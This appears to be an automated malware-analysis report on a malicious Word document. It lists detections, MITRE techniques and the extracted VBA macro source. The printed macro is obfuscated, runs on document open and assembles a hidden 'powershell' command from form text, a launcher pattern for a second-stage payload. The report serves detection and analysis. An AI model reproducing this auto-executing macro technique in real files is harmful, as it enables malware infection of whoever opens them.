MALICIOUS
182
Risk Score
Malware Insights
MITRE ATT&CK
T1059.005 Visual Basic
T1204.002 Malicious File
T1059 Command and Scripting Interpreter
The sample contains VBA macros, including a Document_Open macro, which is a common technique for executing malicious code upon opening the document. The critical heuristic firing for Shell() call in VBA indicates that the macro attempts to execute an external program. The script explicitly constructs the command 'powershell.exe shell.exe', suggesting it downloads and executes a second-stage payload. The ClamAV detection further confirms its malicious nature.
Heuristics 5
-
ClamAV: Doc.Malware.Sonbokli-6846334-0 critical CLAMAV_DETECTIONClamAV detected this file as malware: Doc.Malware.Sonbokli-6846334-0
-
VBA macros detected medium 2 related findings OLE_VBA_MACROSDocument contains VBA macro code
-
Shell() call in VBA critical OLE_VBA_SHELLShell() call in VBA
-
Document_Open macro high OLE_VBA_DOCOPENDocument_Open macro
-
Embedded URL info EMBEDDED_URLOne or more URLs were extracted from the document. The URL itself is not a detection — see the per-URL labels for which channel (macro, JS, link annotation, document body, ...) reached each URL.URL http://ns.adobe.com/xap/1.0/ In document text (OLE body)
- http://www.w3.org/1999/02/22-rdf-syntax-ns#In document text (OLE body)
- http://purl.org/dc/elements/1.1/In document text (OLE body)
- http://ns.adobe.com/photoshop/1.0/In document text (OLE body)
- http://ns.adobe.com/xap/1.0/mm/In document text (OLE body)
- http://ns.adobe.com/xap/1.0/sType/ResourceRef#In document text (OLE body)
- http://ns.adobe.com/tiff/1.0/In document text (OLE body)
- http://ns.adobe.com/exif/1.0/In document text (OLE body)
- http://schemas.openxmlformats.org/drawingml/2006/mainIn document text (OLE body)
Extracted artifacts 1
Files carved from inside the sample during analysis.
| Filename | Kind | Source | Size |
|---|---|---|---|
macros.bas |
vba-macro | oletools.olevba.extract_macros (decoded VBA source) | 1824 bytes |
SHA-256: 2e4d577fad4e6eb0e298af2b034103b7e91009fa6e919eb315d6123e559b2717 |
|||
Preview scriptFirst 1,000 lines of the extracted script
Attribute VB_Name = "ThisDocument"
Attribute VB_Base = "1Normal.ThisDocument"
Attribute VB_GlobalNameSpace = False
Attribute VB_Creatable = False
Attribute VB_PredeclaredId = True
Attribute VB_Exposed = True
Attribute VB_TemplateDerived = True
Attribute VB_Customizable = True
Sub Document_Open()
Dim n8o1nRGgF(10 To 202) As String
n8o1nRGgF(10) = "whOJQ7KiT"
Dim IFrOCcNgG As Long
IFrOCcNgG = (824 - 804) + (49)
Dim PaNK0() As Byte
Dim Jr6pNQ As Long
Jr6pNQ = (-478 + 487) / (16)
Dim zxAj42() As Byte
Call w("er")
End Sub
Attribute VB_Name = "jZ9rVSuj4"
Sub w(btxDWvsP)
Dim Q3e9Fof(13 To 251) As String
Q3e9Fof(13) = "erYt2UMa"
Dim XfeTcwd(153) As Byte
Dim RK5BF As String
RK5BF = txP0Dhy
Dim HyCxm2K As String
HyCxm2K = fxv5XHnwj
Dim Z1WmJR70
Z1WmJR70 = YgZ4h1
Dim vn3Kc6Drz() As Byte
Dim RB5O13(13 To 210) As String
RB5O13(13) = "fHR72l8BO"
Dim uR8aJuFUf() As Byte
Dim nENVbXZ(11 To 248) As Long
nENVbXZ(11) = 185 - 142
UJq4K = "shell.exe "
Dim KFh83
KFh83 = BsqR8t
Shell gzpSZ() _
& btxDWvsP _
& UJq4K _
& hqpUXaIRz _
, 0
End Sub
Attribute VB_Name = "pSAcjw5"
Public Function gzpSZ() As String
Dim sAJx6fMOd(10 To 72) As Long
sAJx6fMOd(10) = 1808 / 226
gzpSZ = "pow"
End Function
Attribute VB_Name = "DEp0w"
Public Function hqpUXaIRz()
Dim GOHP1Sh As Object
Set GOHP1Sh = New f
Dim HorpxG6E As Long
HorpxG6E = (-1238 + 1242) + (23)
Dim nBQ1ZkwX As String
nBQ1ZkwX = GOHP1Sh.de.Text
hqpUXaIRz = nBQ1ZkwX
End Function
Attribute VB_Name = "f"
Attribute VB_Base = "0{24C19680-0CBF-4C8D-A6AA-4713CE500401}{4DCEDCA2-ED5C-4D7B-8726-79B0D80D01D4}"
Attribute VB_GlobalNameSpace = False
Attribute VB_Creatable = False
Attribute VB_PredeclaredId = True
Attribute VB_Exposed = False
Attribute VB_TemplateDerived = False
Attribute VB_Customizable = False
|
|||
Open this report in the interactive analyzer, or submit your own file for analysis.